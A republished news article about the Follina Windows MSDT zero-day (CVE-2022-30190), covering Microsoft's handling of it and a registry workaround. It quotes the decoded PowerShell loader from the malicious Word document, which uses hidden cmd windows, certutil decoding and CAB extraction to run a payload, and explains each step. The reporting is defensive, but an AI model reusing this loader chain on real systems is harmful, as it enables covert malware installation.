Categories: Technology

Code execution 0-day in Windows has been under active exploit for 7 weeks

[ad_1]

A critical code execution zero-day in all supported versions of Windows has been under active exploit for seven weeks, giving attackers a reliable means for installing malware without triggering Windows Defender and a roster of other endpoint protection products.

The Microsoft Support Diagnostic Tool vulnerability was reported to Microsoft on April 12 as a zero-day that was already being exploited in the wild, researchers from Shadow Chaser Group said on Twitter. A response dated April 21, however, informed the researchers that the Microsoft Security Response Center team didn’t consider the reported behavior a security vulnerability because, supposedly, the MSDT diagnostic tool required a password before it would execute payloads.

Uh, nevermind

On Monday, Microsoft reversed course, identifying the behavior with the vulnerability tracker CVE-2022-30190 and warning for the first time that the reported behavior constituted a critical vulnerability after all.

“A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,” the advisory stated. “An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.”

At the time of this story’s publication, Microsoft had yet to issue a patch. Instead, it was advising customers to disable the MSDT URL Protocol by:

  1. Run Command Prompt as Administrator.
  2. To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename
  3. Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”

Although initially missed by Microsoft, the vulnerability was again spotted when a researcher identified a Word document uploaded to VirusTotal on Friday that exploited the previously unknown attack vector.

According to analysis by researcher Kevin Beaumont, the document uses Word to retrieve an HTML file from a remote web server. The document then uses the MSProtocol URI scheme to load and execute PowerShell commands.

“That should not be possible,” Beaumont wrote.

Unfortunately, it is possible.

When the commands in the document are decoded, they translate to:

$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

According to researcher John Hammond of security firm Huntress, the script:

  • Starts hidden windows to:
    • Kill msdt.exe if it is running
    • Loop through files inside a RAR file, looking for a Base64 string for an encoded CAB file
      • Store this Base64 encoded CAB file as 1.t
      • Decode the Base64 encoded CAB file to be saved as 1.c
      • Expand the 1.c CAB file into the current directory, and finally:
      • Execute rgb.exe (presumably compressed inside the 1.c CAB file)

Beaumont also called attention to this academic paper, which in August 2020 showed how to use MSDT to execute code. That suggests that there was at least one other time the company’s security team failed to grasp the potential for this behavior to be maliciously exploited.

No, Protected View won’t save you

Normally, Word is set up to load content downloaded from the Internet in what’s known as protected view, a mode that disables macros and other potentially harmful functions. For reasons that aren’t clear, Beaumont said, if the document is loaded as a Rich Text Format file, it “runs without even opening the document (via the preview tab in Explorer) let alone Protected View.

In other words, Huntress researchers wrote, the RTF file can “trigger the invocation of this exploit with just the Preview Pane within Windows Explorer.” In so doing, “this extends the severity of this threat by not just ‘single-click’ to exploit, but potentially with a ‘zero-click’ trigger.”

Besides the document uploaded to VirusTotal on Friday, researchers uncovered a separate Word file uploaded on April 12 that exploits the same zero-day.

Given the severity of this unpatched vulnerability, organizations that rely on Microsoft Office should thoroughly investigate how it affects their networks. Disabling the MSDT URL Protocol isn’t likely to create major disruptions in the short run and possibly in the long run. While investigating—at least until Microsoft releases more details and guidance—Office users should turn the protocol off entirely and give any documents downloaded over the Internet additional scrutiny.

[ad_2]
Source link
Admin

Recent Posts

Super Slot Games Review

Super slots provide the pinnacle of casino gaming with their interactive bonus rounds, captivating graphics,…

4 months ago

The Evolution and Impact of  Nanomedicine

Introduction to Nanomedicine Nanomedicine, a subfield of nanotechnology, involves the application of nanoscale materials and…

4 months ago

Chumba Online Casino Review

Chumba Casino provides an extraordinary online gaming experience. Its sweepstakes model allows players to win…

5 months ago

How to Find the Best Online Casinos to Play For Free

Online casinos provide quick, simple, and highly convenient gambling experiences for their players. Offering a…

5 months ago

How to Achieve a Flawless Complexion with the Right Products

Achieving a flawless complexion is a common skincare goal. With the right face care products, you can enhance…

5 months ago

Creating Ideal Matches: The Mutual Selection of Clients and Businesses

Shared values and goals, transparency, understanding each other's needs, communication, and respecting boundaries are vital…

5 months ago